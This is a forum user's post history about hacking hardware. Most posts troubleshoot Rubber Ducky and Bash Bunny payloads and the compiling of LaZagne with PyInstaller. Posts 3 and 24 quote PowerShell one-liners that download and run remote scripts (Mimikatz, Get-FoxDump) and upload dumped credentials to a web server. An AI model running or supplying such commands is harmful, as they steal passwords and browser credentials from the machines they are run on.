Jump to content

Exmix

Active Members
  • Posts

    198
  • Joined

  • Last visited

  • Days Won

    1

Everything posted by Exmix

  1. So my WiFi card is the Realtek RTL8723BE. When i'm on my Windows Partition i get a normal signal and it works OK, but when I swithc to Kali, im kinda forced to use my TP-Link TL-WN722N adapter since it helps me get a better signal. I looked into and found the rltwifi_new, I have it installed and such, but that didn't help. I have my /etc/modprob.d/rtl8723be.conf to be "options rtl8723be ips=0 ant_sel=1 fwlps=0" but so far these are the only options i've found to "fix" this. Wondering here if anyone else has any ideas to help. Most other forums/Subreddits i've asked on I haven't gotten an answer from in about 2 weeks. =\
  2. Wow, I feel so silly. That's the one thing I didn't check... I got it running on there with no issues as soon as I Installed and enabled php. Thank you so much. Also I like your script as well, i'll grab that and save it for when I wanna try that. Seems simpler and doesn't require internet connection.
  3. So messing with this Payload I found here: https://www.hak5.org/blog/15-second-password-hack-mr-robot-style I got it all working up to the point where it tries to output the file back to my Web Server. I get an error that says: Exception calling "UploadString" with "2" argument(s): "The remote server returned and error: (405) Method not allowed." At line:1 char:156 + IEX (New-Object Net.WebClient).DownloadString('Http://MyWebServer/im.ps1'): $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString <<<< ('Http://MyWebServer/rx.php', $output) +CategoryInfo : NotSpecified: (:) []. MethodInvocationException +FullyQualifiedErrorID : DotNetMethodException So I was looking into this error for a while and I can't really find much on how to fix this. My WebServer is Windows 2012 R2. I was wondering if anyone could help me fix this part here possibly OR help with how to just output it to a .txt file or something on the SD Card since I have my duck as the TwinDuck.
  4. Mobile I go with Chrome, trying out the new Firefox Focus. PC I use Cyberfox(Variation of firefox obviously), and Vivaldi(variation of chrome). Vivaldi doesn't always run what i'd like it to sometimes so I don't use it AS often but still often enough.
  5. I did, I just didn't think to click the link because half the time when I do, they just re-link me back to the main github page which I looked at countless times. xD
  6. WELP time to go jump off a bridge, xD Thanks for the help. Apparently i'm just dumb as a rock.. xD
  7. That's where I was getting this from and I see no .exe anywhere in there. Maybe i'm blind. I looked through it before posting about it. I'm double checking it now. EDIT: Looked through ad nothing but a bunch of python files.
  8. Don't actually NEED it. I was trying to get laZagne.exe to use with the PasswordGrabber script for the BB. It is becoming more of a hastle than it's worth, I agree with you there. So was just trying a few things to play around with,
  9. Been looking into it but honestly so far it doesn't make a whole lot of sense. Main things i've found were I can install something called Drush and do it that was but that's also saying i'd need to download and enable all the modules one at a time, which might not be too bad, just time consuming by going through the warnlazagne log I have and going through that.
  10. I figured as much. xD Hoping he might post it for us to get. I think it'd be a pretty nifty little module to have.
  11. Where'd you get the SSH Web Client Module? That's pretty neat actually.
  12. Nah it does. I'm currently at a friends house and their WiFi isn't the greatest. It works fine anywhere else. So i'm on linux now and I ran: sudo pyinstaller laZagne.py Since I opened a terminal in that folder. It went through and made it but I got another warnlazagne.txt
  13. Well maybe i'll try it on my linux here in a bit. I dualboot and like I mentioned before, for some reason the WIfi card won't pick up the WIfi when using linux but doesn't have much trouble with WIndows.
  14. So it would be something like this? idle.py -r pyinstaller.py /path/to.laZagne.py
  15. Edited my last post since a part of it got cut off. I tried this. my exact code. C:\Users\Tek\Downloads\pyinstaller-develop\pyinstaller.py C:\Users\Tek\Daemons\LaZagne-master\Windows\laZagne.py This time it highlights the first : after the C
  16. Syntax error: There's an error in your program: invalid syntax It highlights the "C" in the path to laZagne.py. I did also try running it from where laZagne.py is stored at as well.
  17. Still not completely following. Sorry, Like I said i'm very new to python(Programming in general) and know very little. I run IDLE and put "pyinstaller /path/to/laZagne.py" but I get a Syntax error. I did run "python pyinstaller.py path/to/lazagne.py" through cmd again, I do get an .exe but I also get some other files and a warnlazagne.txt.
  18. So basically make a script that is like: import pyinstaller pyinstaller /path/to/lazagne.py Sorry, still a tad new to Python. Its the first language i'm working on. Only know some of the basics.
  19. Done, and this is what returned: Requirement already satisfied: pyinstaller in c:\python27\lib\site-packages Requirement already satisfied: setuptools in c:\python27\lib\site-packages (from pyinstaller) Requirement already satisfied: future in c:\python27\lib\site-packages (from pyinstaller)
  20. Currently on windows at the moments since for some odd reason where I am currently linux doesn't wanna pickup the wifi. But thats another issue of mine for another day. Here is something I was trying. C:\Users\Tek\Downloads\pyinstaller-develop>python pyinstaller.py PyInstaller cannot check for assembly dependencies. Please install PyWin32 or pywin32-ctypes. pip install pypiwin32 C:\Users\Tek\Downloads\pyinstaller-develop>pip install pypiwin32 'pip' is not recognized as an internal or external command, operable program or batch file. So i ran "python.exe -m pip install pypiwin32" and it did install properly. SO I went on to do this: So now I have an .exe but I got a Warnings log that makes me wonder if something went wrong. Warning log:
  21. Yeah, I go to the Lazagne.py directory and run: python pyinstaller lazagne.py and get this: "python: can't open file 'pyinstaller': [Errno 2] No such file or directory" Same error returns when running the pip command, Like "python pip install pyinstaller"
  22. Well shit, I feel stupid. I completely forgot I had Python3 installed. I never use it. I uninstalled it and now Pyinstaller doesn't work. I tried to reinstall it with the pip command and that doesn't wanna work now. I did "python.exe -m pip install pyinstaller" from the python 2.7 directory. It installed but still doesn't seem to wanna work. Gonna keep working on this.
  23. Ah ok, so that was my first mistake, I have Lazagne from the Github by Alessandro, I was looking around and was able install pyinstaller but am unable to compile it to get the .exe. when I run "pyinstaller lazagne.py" or "pyinstaller lazagne.spec" I get this in return: 0 WARNING: Internal error: early pywin32 import was introduced 125 INFO: PyInstaller: 3.3.dev0+15770dadc 125 INFO: Python: 3.6.0 125 INFO: Platform: Windows-10-10.0.15063-SP0 125 INFO: wrote C:\Users\Tek\Daemons\LaZagne-master\Windows\lazagne.spec 125 INFO: UPX is not available. 125 INFO: Extending PYTHONPATH with paths ['C:\\Users\\Tek\\Daemons\\LaZagne-master\\Windows', 'C:\\Users\\Tek\\Daemons\\LaZagne-master\\Windows'] 125 INFO: checking Analysis 125 INFO: Building Analysis because out00-Analysis.toc is non existent 125 INFO: Initializing module dependency graph... 125 INFO: Initializing module graph hooks... 140 INFO: Analyzing base_library.zip ... 3500 INFO: running Analysis out00-Analysis.toc 3500 INFO: Adding Microsoft.Windows.Common-Controls to dependent assemblies of final executable required by C:\Users\Tek\AppData\Local\Programs\Python\Python36-32\python.exe 3547 WARNING: lib not found: api-ms-win-crt-math-l1-1-0.dll dependency of C:\Users\Tek\AppData\Local\Programs\Python\Python36-32\python.exe 3578 WARNING: lib not found: api-ms-win-crt-stdio-l1-1-0.dll dependency of C:\Users\Tek\AppData\Local\Programs\Python\Python36-32\python.exe 3625 WARNING: lib not found: api-ms-win-crt-locale-l1-1-0.dll dependency of C:\Users\Tek\AppData\Local\Programs\Python\Python36-32\python.exe 3656 WARNING: lib not found: api-ms-win-crt-heap-l1-1-0.dll dependency of C:\Users\Tek\AppData\Local\Programs\Python\Python36-32\python.exe 3703 WARNING: lib not found: api-ms-win-crt-runtime-l1-1-0.dll dependency of C:\Users\Tek\AppData\Local\Programs\Python\Python36-32\python.exe 3750 WARNING: lib not found: api-ms-win-crt-environment-l1-1-0.dll dependency of C:\Users\Tek\AppData\Local\Programs\Python\Python36-32\python36.dll 3797 WARNING: lib not found: api-ms-win-crt-math-l1-1-0.dll dependency of C:\Users\Tek\AppData\Local\Programs\Python\Python36-32\python36.dll 3828 WARNING: lib not found: api-ms-win-crt-locale-l1-1-0.dll dependency of C:\Users\Tek\AppData\Local\Programs\Python\Python36-32\python36.dll 3875 WARNING: lib not found: api-ms-win-crt-time-l1-1-0.dll dependency of C:\Users\Tek\AppData\Local\Programs\Python\Python36-32\python36.dll 3906 WARNING: lib not found: api-ms-win-crt-runtime-l1-1-0.dll dependency of C:\Users\Tek\AppData\Local\Programs\Python\Python36-32\python36.dll 3937 WARNING: lib not found: api-ms-win-crt-stdio-l1-1-0.dll dependency of C:\Users\Tek\AppData\Local\Programs\Python\Python36-32\python36.dll 3984 WARNING: lib not found: api-ms-win-crt-heap-l1-1-0.dll dependency of C:\Users\Tek\AppData\Local\Programs\Python\Python36-32\python36.dll 4016 WARNING: lib not found: api-ms-win-crt-convert-l1-1-0.dll dependency of C:\Users\Tek\AppData\Local\Programs\Python\Python36-32\python36.dll 4062 WARNING: lib not found: api-ms-win-crt-filesystem-l1-1-0.dll dependency of C:\Users\Tek\AppData\Local\Programs\Python\Python36-32\python36.dll 4094 WARNING: lib not found: api-ms-win-crt-string-l1-1-0.dll dependency of C:\Users\Tek\AppData\Local\Programs\Python\Python36-32\python36.dll 4141 WARNING: lib not found: api-ms-win-crt-process-l1-1-0.dll dependency of C:\Users\Tek\AppData\Local\Programs\Python\Python36-32\python36.dll 4172 WARNING: lib not found: api-ms-win-crt-conio-l1-1-0.dll dependency of C:\Users\Tek\AppData\Local\Programs\Python\Python36-32\python36.dll 4219 WARNING: lib not found: api-ms-win-crt-stdio-l1-1-0.dll dependency of C:\Users\Tek\AppData\Local\Programs\Python\Python36-32\VCRUNTIME140.dll 4250 WARNING: lib not found: api-ms-win-crt-heap-l1-1-0.dll dependency of C:\Users\Tek\AppData\Local\Programs\Python\Python36-32\VCRUNTIME140.dll 4297 WARNING: lib not found: api-ms-win-crt-convert-l1-1-0.dll dependency of C:\Users\Tek\AppData\Local\Programs\Python\Python36-32\VCRUNTIME140.dll 4328 WARNING: lib not found: api-ms-win-crt-string-l1-1-0.dll dependency of C:\Users\Tek\AppData\Local\Programs\Python\Python36-32\VCRUNTIME140.dll 4375 WARNING: lib not found: api-ms-win-crt-runtime-l1-1-0.dll dependency of C:\Users\Tek\AppData\Local\Programs\Python\Python36-32\VCRUNTIME140.dll 4375 INFO: Caching module hooks... 4375 INFO: Analyzing C:\Users\Tek\Daemons\LaZagne-master\Windows\lazagne.py Traceback (most recent call last): File "C:\Users\Tek\AppData\Local\Programs\Python\Python36-32\Scripts\pyinstaller-script.py", line 11, in <module> load_entry_point('PyInstaller==3.3.dev0+15770dadc', 'console_scripts', 'pyinstaller')() File "C:\Users\Tek\AppData\Local\Programs\Python\Python36-32\lib\site-packages\pyinstaller-3.3.dev0+15770dadc-py3.6.egg\PyInstaller\__main__.py", line 92, in run run_build(pyi_config, spec_file, **vars(args)) File "C:\Users\Tek\AppData\Local\Programs\Python\Python36-32\lib\site-packages\pyinstaller-3.3.dev0+15770dadc-py3.6.egg\PyInstaller\__main__.py", line 46, in run_build PyInstaller.building.build_main.main(pyi_config, spec_file, **kwargs) File "C:\Users\Tek\AppData\Local\Programs\Python\Python36-32\lib\site-packages\pyinstaller-3.3.dev0+15770dadc-py3.6.egg\PyInstaller\building\build_main.py", line 790, in main build(specfile, kw.get('distpath'), kw.get('workpath'), kw.get('clean_build')) File "C:\Users\Tek\AppData\Local\Programs\Python\Python36-32\lib\site-packages\pyinstaller-3.3.dev0+15770dadc-py3.6.egg\PyInstaller\building\build_main.py", line 736, in build exec(text, spec_namespace) File "<string>", line 16, in <module> File "C:\Users\Tek\AppData\Local\Programs\Python\Python36-32\lib\site-packages\pyinstaller-3.3.dev0+15770dadc-py3.6.egg\PyInstaller\building\build_main.py", line 213, in __init__ self.__postinit__() File "C:\Users\Tek\AppData\Local\Programs\Python\Python36-32\lib\site-packages\pyinstaller-3.3.dev0+15770dadc-py3.6.egg\PyInstaller\building\datastruct.py", line 161, in __postinit__ self.assemble() File "C:\Users\Tek\AppData\Local\Programs\Python\Python36-32\lib\site-packages\pyinstaller-3.3.dev0+15770dadc-py3.6.egg\PyInstaller\building\build_main.py", line 415, in assemble priority_scripts.append(self.graph.run_script(script)) File "C:\Users\Tek\AppData\Local\Programs\Python\Python36-32\lib\site-packages\pyinstaller-3.3.dev0+15770dadc-py3.6.egg\PyInstaller\depend\analysis.py", line 196, in run_script self._top_script_node = super(PyiModuleGraph, self).run_script(pathname) File "C:\Users\Tek\AppData\Local\Programs\Python\Python36-32\lib\site-packages\pyinstaller-3.3.dev0+15770dadc-py3.6.egg\PyInstaller\lib\modulegraph\modulegraph.py", line 1386, in run_script co_ast = compile(contents, pathname, 'exec', ast.PyCF_ONLY_AST, True) File "C:\Users\Tek\Daemons\LaZagne-master\Windows\lazagne.py", line 168 print '[+] File written: ' + constant.folder_name + os.sep + constant.file_name_results + '.json' ^ SyntaxError: Missing parentheses in call to 'print'
  24. I am trying these payloads on WIndows10 and Windows7, I am on using Firmware V1.3, after essing with some payloads most i've tried seem to work OK(I haven't tried them ALL) but I noticed 2 that don't seem to work for me: PasswordGrabber and BroswerCreds. When I run PasswordGrabber I get an empty folder and an empty ,txt file. When I run BrowserCreds I get an error after this line ">IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/bit.ly\/2mLu0R3\'\)\; Get-FoxDump \| Out-File -Append \$Bunny\\loot\\BrowserCreds\\\$env:computername.txt" Error: New-Object : Cannot find type [Net.WebClient\]: verify that the assembly containing this type is loaded. At line:1 char:7 + IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/bit.ly\/2 ... + ~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : InvalidType: (:) [New-Object], PSArgumentException + FullyQualifiedErrorId : TypeNotFound,Microsoft.PowerShell.Commands.NewObjectCommand Get-FoxDump : The term 'Get-FoxDump' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again. At line:1 char:83 + ... .DownloadString\(\'http:\/\/bit.ly\/2mLu0R3\'\)\; Get-FoxDump \| Out- ... + ~~~~~~~~~~~ + CategoryInfo : ObjectNotFound: (Get-FoxDump:String) [], CommandNotFoundException + FullyQualifiedErrorId : CommandNotFoundException
×
×
  • Create New...